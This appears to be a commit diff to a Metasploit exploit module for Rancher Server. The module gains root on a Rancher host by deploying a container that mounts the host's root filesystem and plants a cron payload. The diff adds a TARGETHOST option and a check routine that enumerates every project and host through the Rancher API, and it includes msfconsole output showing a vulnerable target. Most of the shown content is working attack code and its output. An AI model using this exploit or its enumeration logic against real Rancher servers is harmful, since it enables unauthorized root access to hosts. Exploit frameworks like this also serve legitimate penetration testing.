Function for selecting the target host

Author: mpizala

documentation/modules/exploit/linux/http/rancher_server.md

@@ -84,6 +84,7 @@ This module is designed to gain root access on a Rancher Host.
 - CONTAINER_ID if you want to have a human readable name for your container, otherwise it will be randomly generated.
 - DOCKERIMAGE is the local image or hub.docker.com available image you want to have Rancher to deploy for this exploit.
 - TARGETURI this is the Rancher Server API path. The default environment is `/v1/projects/1a5`.
+- TARGETHOST is the Rancher Host ID for the target system. The default host is `1h1`.
 - WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start.
 
 By default access control is disabled, but if enabled, you need API
@@ -112,6 +113,8 @@ LHOST => 192.168.91.1
 msf exploit(rancher_server) > set VERBOSE true
 VERBOSE => true
 msf exploit(rancher_server) > check
+
+[+] TARGETHOST 1h1 found on TARGETURI /v1/projects/1a5
 [*] 192.168.91.111:8080 The target appears to be vulnerable.
 msf exploit(rancher_server) > exploit
 

modules/exploits/linux/http/rancher_server.rb

@@ -40,6 +40,7 @@ def initialize(info = {})
       [
         Opt::RPORT(8080),
         OptString.new('TARGETURI', [ true, 'Path to Rancher Environment', '/v1/projects/1a5' ]),
+        OptString.new('TARGETHOST', [ true, 'Target Rancher Host', '1h1' ]),
         OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'alpine:latest' ]),
         OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ]),
         OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
@@ -85,6 +86,7 @@ def make_container(mnt_path, cron_path, payload_path, container_id)
       'instanceTriggeredStop'           => 'stop',
       'startOnCreate'                   => true,
       'networkMode'                     => 'managed',
+      'requestedHostId'                 => datastore['TARGETHOST'],
       'type'                            => 'container',
       'dataVolumes'                     => [ '/:' + mnt_path ],
       'imageUuid'                       => 'docker:' + datastore['DOCKERIMAGE'],
@@ -97,7 +99,7 @@ def make_container(mnt_path, cron_path, payload_path, container_id)
   def check
     res = send_request_raw(
       'method'  => 'GET',
-      'uri'     => normalize_uri(target_uri.path, 'containers'),
+      'uri'     => normalize_uri('/v1/projects'),
       'headers' => { 'Accept' => 'application/json' }
     )
 
@@ -112,7 +114,23 @@ def check
     end
 
     if res.code == 200 and res.headers.to_json.include? 'X-Rancher-Version'
-      return Exploit::CheckCode::Appears
+      # get all rancher environments
+      projects = JSON.parse(res.body)['data'].map{ |data| data['id'] }
+      # get all hosts from environments
+      target_found = false
+      projects.each do |project|
+        res = send_request_raw(
+            'method'  => 'GET',
+            'uri'     => normalize_uri('/v1/projects', project, 'hosts'),
+            'headers' => { 'Accept' => 'application/json' }
+        )
+        hosts = JSON.parse(res.body)['data'].map{ |data| data['id'] }
+        hosts.each do |host|
+          target_found = true
+          print_good ("TARGETHOST #{host} found on TARGETURI /v1/projects/#{project}")
+        end
+      end
+      return Exploit::CheckCode::Appears if target_found == true
     end
 
     Exploit::CheckCode::Safe